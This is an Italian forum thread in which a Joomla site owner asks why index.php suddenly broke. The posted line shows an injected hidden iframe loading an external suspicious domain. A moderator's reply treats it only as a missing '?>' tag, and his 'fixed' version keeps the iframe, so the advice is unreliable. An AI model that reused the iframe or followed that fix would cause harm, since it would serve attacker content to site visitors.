Back to top

Autore Topic: Problema con index sito  (Letto 1092 volte)

Offline teosweb

• Nuovo arrivato
  • *
    • Mostra profilo
Problema con index sito
« il: 28 Feb 2012, 10:20:27 »
Salve e grazie a chi mi aiuterà,
fino a ieri il sito funzionava, questa mattina invece quando ho tentato di accedere mi dava questo errore

Parse error:  syntax error, unexpected '<' in /home/mhd-01/www.essereobenessere.it/htdocs/index.php on line 88

premetto che nella giornata di ieri non ho fatto alcuna modifica al sito.

ho risolto caricando la copia dell'index.php che avevo in locale e la situazione si è sbloccata. ho dovuto anche fare la stessa operazione con index del template e index della cartella administrator.

posto la differenza nella linea 88 tra i due index, il primo non funzionante e quello in remoto che si è modificato da solo ed il secondo quello in locale che funziona. vorrei sapere cosa è successo?

NON FUNZIONANTE
echo JResponse::toString($mainframe->getCfg('gzip'));<html><body><iframe src='http://ssl-security-sertificate.com//' height=60 width=468 border=0 scrolling=no></iframe></body></html>

FUNZIONANTE
echo JResponse::toString($mainframe->getCfg('gzip'));
ringrazio già da ora chi mi darà chiarimenti.

questi i dati di sistema:
PHP creato il: Linux w-11.th.seeweb.it 2.6.32-5-amd64 #1 SMP Mon Oct 3 03:59:20 UTC 2011 x86_64         
Versione database: 5.1.49-3         
Collation Database: utf8_general_ci         
Versione PHP: 5.3.3-7+squeeze1         
Server Web: Apache         
Server web per interfaccia PHP: cgi-fcgi         
Versione di Joomla!: Joomla! 1.5.25 Stable [ senu takaa ama mamni ] 14-November-2011 18:00 GMT         
User Agent: Mozilla/5.0 (Windows NT 5.1; rv:10.0.2) Gecko/20100101 Firefox/10.0.2         
l'hosting è su TOPH.....

Offline Murphz

• Global Moderator
  • Abituale
  • Trust No1
    • Mostra profilo
Re:Problema con index sito
« Risposta #1 il: 28 Feb 2012, 10:46:24 »
In quello non funzionante non è stato chiuso il php con ?> e quindi il primo simbolo di apertura html, cioè < non viene ovviamente riconosciuto da php.

Cioè:
Codice: [Seleziona]
echo JResponse::toString($mainframe->getCfg('gzip'));
?>

<html><body><iframe src='http://ssl-security-sertificate.com//' height=60 width=468 border=0 scrolling=no></iframe></body></html>
Freelance Web & Graphic Design // Twitter

"...Nothing Important Happened Today..."

Offline teosweb

• Nuovo arrivato
  • *
    • Mostra profilo
Re:Problema con index sito
« Risposta #2 il: 28 Feb 2012, 10:52:05 »
ok, ma non avendo fatto io alcuna modifica al codice mi chiedevo cosa era successo

Web Design Bolzano Kreatif